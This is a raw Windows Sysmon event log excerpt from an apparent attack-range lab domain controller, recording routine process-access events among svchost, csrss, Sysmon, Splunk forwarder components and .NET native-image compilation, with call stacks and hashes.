13:26:17.058{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008469Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.058{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008468Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.058{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008467Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.058{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008466Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.058{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4678-6000-5804-000000009A01}4740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008465Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.058{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4678-6000-5804-000000009A01}4740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008464Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.918{08A6967A-4678-6000-5804-000000009A01}4740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008514Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.668{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-467A-6000-5D04-000000009A01}3888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008513Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.652{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-467A-6000-5D04-000000009A01}3888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008512Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.652{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-467A-6000-5D04-000000009A01}3888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008511Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.589{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-467A-6000-5C04-000000009A01}4756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008510Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.574{08A6967A-467A-6000-5B04-000000009A01}42645020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008509Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.574{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-467A-6000-5C04-000000009A01}4756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008508Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.574{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-467A-6000-5C04-000000009A01}4756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008507Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:18.464{08A6967A-4679-6000-5904-000000009A01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\10b4-0\System.Data.Services.dll2021-01-14 13:26:18.464 10341000x80000000000000008506Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.433{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-467A-6000-5B04-000000009A01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008505Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.433{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008504Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.433{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008503Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.433{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008502Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.433{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008501Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.433{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008500Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.433{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008499Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.433{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008498Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.433{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008497Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.433{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008496Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.433{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-467A-6000-5B04-000000009A01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008495Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:18.433{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-467A-6000-5B04-000000009A01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 